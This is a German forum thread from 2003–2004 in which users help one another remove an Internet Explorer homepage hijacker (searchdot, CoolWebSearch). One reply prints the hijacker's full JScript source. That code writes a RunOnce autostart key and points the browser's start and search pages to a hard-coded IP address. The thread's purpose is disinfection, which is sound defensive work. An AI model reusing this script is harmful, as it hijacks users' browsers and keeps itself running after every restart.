# IE Startseite nach jedem Neustart neu!



## NO MA AM (16. Oktober 2003)

Ein freundlich Hallo erstmal in die Runde  

Ich hab seit neuester Zeit ein wirklich lästiges Problem! 
und ... ja... ich hab  schon benutzt! 
Ich bin auch fündig geworden: 
Keeny  hat oder hatte ein ähnliches Problem!

Ich habe auch alle Anweisungen und Ratschläge befolgt, nämlich 
-Startseite versucht natürlich manuell zu ändern - geht, nach dem Neustart wieder die unerwünschte
-Ad-Aware drüber laufen lassen - nix genützt
-regedit eingegeben und in der Registrierung durch suchen alles was mit searchdot zutun hat gelöscht oder ersetzt!
-dann wie vom Thomas beschrieben im IE Menü irgendwelche Objekte gelöscht
- dann noch dieses Autostart programm runtergeladen und dadurch überprüft

Dazu muss ich sagen, dass ich eigentlich ein absoluter Laie im Computer bin und kein Plan von den ganzen Fach-Terminas habe  

Aber noch ne kurze Beschreibung der Situation:
Habe: WinXP, DSL-Flat, IE6.0 

Das Problem ist, dass seit mehreren Tagen ich als Startseite immer diese blöde http://www.searchdot.net habe Und diese ums verrecken nicht wegkriege! Die angewandten Methoden habe ich ja schon erläutert.

Zu diesem Autostart Programm kann ich nur sagen, dass da ich kein Plan von dem ganzen getue habe mir die ganzen Sachen, die da drin sind, nicht viel bis nichts sagen. Ich habe hauptsächlich nach allem gesucht was irgendwie nach searchdot aussieht oder klingt oder etwas was sehr verdächtig aussieht, doch bis jetzt alles ohne Erfolg  

Wäre für jede Hilfe suuuper Dankbar!


----------



## SilentWarrior (16. Oktober 2003)

Holdrio

Kann dir wahrscheinlich nicht viel helfen, nur kurz was zu der Sache mit dem Autostart. Probier's mal so:

1. Start -> Ausführen -> "msconfig"
2. Registerkarte "Dienste" -> Häkchen bei "Alle Microsoft-Dienste ausblenden" -> Alle Häkchen entfernen
3. Registerkarte "Systemstart" -> Ebenfalls alle Häkchen entfernen

Und jetzt den Computer neu starten. Wenn's funktioniert, kannst du ja Schritt für Schritt die einzelnen Sachen wieder aktivieren und so herausfinden, woran's gelegen hat.

Gruss

SilentWarrior


----------



## NO MA AM (16. Oktober 2003)

Uiuiui...
hab da eben mal ein Blick rein riskiert... ist ja ganz schön voll da...
Das meiste klingt auch vernünftig, nur da bin ich ja zwei tage lang am Häckchen setzen und wieder neustarten 
Wie gesagt, für einen Laien ist es nicht leicht sich da zurecht zu finden.
Will auch nix kaputt machen, ist nämlich immer son unnötiger Aufwand mit der Neuinstallation von allem!  

Trotzdem vielen Dank schon mal für die schnelle Antwort!
Alternativen sind sehr willkommen


----------



## NO MA AM (18. Oktober 2003)

Suuper... gibt Neuigkeiten!
Abgesehen davon, dass die Startseitenveränderung immer noch bei jedem Start wiederkommt,
die Seite gibts wohl nicht mehr o.ä.! Dementsprechend wird sie gesucht nicht gefunden usw. 

Wie krieg ich denn das Teil weg!? 
Hat wirklich keiner einen wirkungsvollen Vorschlag!?


----------



## SilentWarrior (19. Oktober 2003)

Ich will ja nicht rummotzen oder so, aber schau dir mal das Datum deines vorherigen Posts an und vergleiche es mit dieser Aussage hier:





> [...] da bin ich ja zwei tage lang am Häckchen setzen [...]


Na, dämmert's?


----------



## NO MA AM (19. Oktober 2003)

Ja sicher!
Deswegen habe ich mich ja auch zwei tage lang nicht gemeldet!
Hab durchgeängig Häckchen gesetzt und weggemacht....


----------



## Georg Melher (19. Oktober 2003)

Google doch mal nach searchdot...da finden sich einige Resultate. Sicher ist da auch was für Dich dabei. Hoffe Dein Englisch ist einigermassen.


----------



## Horst Göllnitz (23. Oktober 2003)

Guten Abend,

hab mal (aus gegebenem Anlaß  ) danachgeforscht:

Im Moment kann ich's aber nicht nachprüfen - also bitte mit aller Vorsicht !

Bitte prüfen Sie, ob auf Ihrem PC die folgende Datei vorhanden ist:
" C:\WINDOWS\FONTS\msoffice.hta "
... wenn ja, steht vermutlich auch der folgend Schlüssel in Ihrer registry:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
	"Msoffice"="C:\\WINDOWS\\FONTS\\msoffice.hta"

Der Aufruf muß, die Datei sollte entfernt werden. 
(Überprüfen Sie vorsichtshalber auch die Run-Schlüssel unter HKCU.)

Gruß Horst Göllnitz

ps. sowas Ähnliches läuft auch für die Suchseite im IE (http://www.tinybar.com) - 
da bin ich noch dran.


----------



## NO MA AM (24. Oktober 2003)

YUHU!
Habs endlich geschafft!   
Neustart ohne diese lästige Page  

Habs so gemacht wie hier empfohlen, hab erstmal im Google geschaut, da hieß es ebenfalls die datei löschen msoffice.hta 
Es ist so, dass du die datei, weil die in dem Fonts Ordner ist so einfach nicht siehst, nur wenn man die Suche benutzt, kommt die Datei zum Vorschein!
Die gelöscht und in der Reg einfach alles was den Namen der Seite enthielt gelöscht oder geändert

Mein Dank wird euch ewig nachschleichen


----------



## WiPe (26. Oktober 2003)

*Beitrag von Horst Göllnitz*

Lieber Horst,
obwohl ich eigentlich defaultmäßig faul bin, habe ich mir die Mühe gemacht,
mich in diesem Forum anzumelden - um Dir zu danken!
Mein PC war auch von diesem Parasiten "searchdot" befallen und ich wollte schon
zur Festplatten-Amputation schreiten weil ich das Luder nicht losgeworden bin.  
Doch zum Glück gibt in der selben Quelle, aus der die Seuche kam, auch die
Rettung.
Danke, daß Du dir die Mühe gemacht hat, Deine Erfahrung weiterzugeben!

Peter W.


----------



## Horst Göllnitz (27. Oktober 2003)

Hallo,

ja eben - "aus der selben Quelle..."

Wer mich einmal vergewaltigt, dem trau ich nicht, wenn er es angeblich ungeschehen machen will.

Sieh Dir mal an, was bei dem "Entfernen"-Link passiert:
1.) es wird eine Script-Datei heruntergeladen und (falls keine Sicherheitseinstallung das verhindert) sofort gestartet -> schon verdächtig !
2.) Diese Datei ist mit großem Aufwand recht effektiv verschlüsselt - man kann als "normaler Mensch" nicht nachvollziehen, was eigentlich passiert -> sehr verdächtig !

Ich hab mir das also angesehen und daraus den o.g. Tipp gemacht.
Tatsächlich scheint der "Entfernen"-Link nicht bösartig.

Original .html im Anhang als  .txt

Gruß Horst Göllnitz


----------



## jeanpoul (20. November 2003)

*bei mir klappt es nicht*

Ich werde diese fiese Seite nicht los egal was ich mache !
glaube ich werde Format C durchführen müssen 
oder hat noch jemand eine Idee 


Gruß Poul


----------



## luckyluke (20. November 2003)

Hallo!
Tja, ad-aware is ja ganz gut, aber mit einigem wird das tool einfach nicht fertig!
Deshalb meine Empfehlung an alle hier: SPYBOT

Es gab bei mir noch keine spyware mit der spybot nicht fertig wurde! ........und es wird sogar noch besser!  freeware 
http://www.chip.de/downloads/c_downloads_8833199.html

Also viel Erfolg!

MfG Lucky


----------



## ZionsGate (12. Dezember 2003)

*Startseite IE*

Problem: IE Startseite durch Fremdeinwirkung geändert und bei jedem Start wieder aktiv! http://www.search-space.com!

Woher  Ich denke Skript oder beim Schliessen eines Popups i Aber ich weiß nicht

Alle Thread Tips und Maßnahmen schon ausgeführt - kein Erfolg!

Achso - der ganze Spaß durch ne Firewall + Virenscanner mit Guard + XP-Antispy + SPYBOT !

Naja über einen konkreten Lösungsansatz wäre ich echt angetan!

Danke ans FORUM UND AN DEN DER ANTWORTET


----------



## Horst Göllnitz (12. Dezember 2003)

... aber ActiveX und/oder Scripting (Java-Script, VbScript) aktiv gehabt ? (in den IE-Einstellungen nachsehen)

... will mich gelegentlich (;-) mal drum kümmern.

Gruß Horst


----------



## rojasa (13. Dezember 2003)

Hi,

es handelt sich sicher um einen Skript, der immer wieder ausgeführt wird sobald Du dich abmeldest bzw. den Computer neu startest. Suche einfach mal auf C: nach *.js und öffne mit Wordpad, die Dateien die unter c:\windows + Unterordner oder c:\programme + Unterordner zu finden sind. Ausnahmen:

c:\windows\system32\oobe
c:\windows\help\tours
c:\programme\real\realone player

Also die Skripst in diesen Ordnern brauchst Du eigentlich nicht öffnen. Bei mir war die Datei update911.js, die unter c:windows zu finden war. Sie sah so aus:

var url = "http://81.211.105.8/index.php?v=1";
var burl = "http://81.211.105.8/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

Sobald Du die Datei gefunden hast (muss nicht update911.js sein), einfach mal im Regedit den Eintrag löschen (und natürlich auch die Datei auf Deiner Festplatte).

ein nützliches Programm findest Du unter http://mjc1.com/mirror/hjt/. Das Programm zeigt alles, was mit Windows über die Registrierung (Regedit)gestartet wird. Einfach Programm starten --> Scann --> die entsprechenden Einträge markieren und --> Fix Cheched und sie zu löschen. Geht wesentlich schneller als mit Regedit zu suchen 

Ich wünsche Dir viel Glück und Erfolg bei der Suche!

Viele Grüße
rojasa


----------



## ZionsGate (15. Dezember 2003)

*IE*

Danke für die Antworten - hab mal alles probiert! Keine ungewöhnliche Datei *.js gefunden! Den HiJACKER mal runtergeladen! Aber hat auch nur einmal was gebracht! Beim zweiten Start alles beim alten! Ich glaube fast da treibt mit mir einer nen übles Spiel - glaube der fast der Eintrag hat sich irgendwo an die IE-Startdatei angehangen! Mal sehen was ich noch so finde! Ansonsten läuft ja alles gut! Aber ich find den Rüpel schon - keine Angst! Trotzdem Vorschläge nehme ich gern an! Dankeschön!

ZionsGate

Zusatz!

Kann auf einmal keine Links mehr ausführen die z.B. auf einem Forumboard auf eine andere Seite verweisen! Ich glaub das hängt mit dem IE-Problem zusammen! Jetzt wirds echt bunt! Bitte um Hilfe!


----------



## ZionsGate (18. Dezember 2003)

*IE Startseite*

So für alle in diesem Forum - niemand konnte mir helfen! Leider schade aber habs nun endlich selbst geschaft!

Und zwar war der Fehler wie vermutet durch ein Skript, jemand hat mir durch die Firewall und Spybot eine dll zugeschoben die tatsächlich immer im Start mitlief Aber so gut getarnt, dass wirklich kein Programm die gefunden hatte! Schrecklich mies von dem hier angepriesenen Spybot S&D! Naja aber ein Programm hats nun doch geschafft und zwar "Security Task Manager" von http://www.neuber.com das ich hiermit hoch lobe und allen mit solchen Probs. vorschlage! Mein Rechner rattert nun wieder richtig und alle Probleme haben sich gelöst! Auf Wiederhören! Echo!


----------



## GMI (25. Januar 2004)

Hallo!

Ich hab mich gerade hier angemeldet, weil ich das selbe Problem hatte und ich euch sagen wollte wie ihr das wegbekommt.
Wir sind alle Opfer von Webseiten-Hijacking geworden. Das heißt durch die Java Virtual Machine von Microsoft ist dieser Trojaner auf das System gekommen. (Ich verwende eigentlich die Virtual Machine von Sun, aber ich hab ihn trotzdem erhalten.) 

Symptome:


Umleitungen auf Coolwebsearch-verwandte Seiten
Umleitungen beim Vertippen bei der URL-Eingabe
Umleitungen, wenn man versucht, Google anzusurfen
IE wird extrem langsam
IE-Startseite ändert sich beim Rebooten
Fügt Websites in die "Sichere Zone" des IE hinzu
Popups bei Suche in Google und Yahoo
Fehler beim Windowsstart in bezug auf WIN.INI und IEDLL.EXE
Verhindern des Änderns/Aufrufens von IE-Einstellungen

Lösung

CWShredder

Bei mir hat es funktioniert. Ich hoffe ich konnte euch etwas weiterhelfen. Um eine Neuansteckung zu verhindern solltet ihr euch die Virtual Machine von Sun ziehen und mal euer Surf-verhalten kontrollieren.

mfg


----------



## nEutRa (25. Januar 2004)

Hi ich hatte bis grade egen auch das problem, jedoch mit einer anderen Seite.
Ich hab das Programm benutzt das GMI Empfohlen hat - es funktionier bei sowas (denk ich) am besten.

greez nEutRa


----------

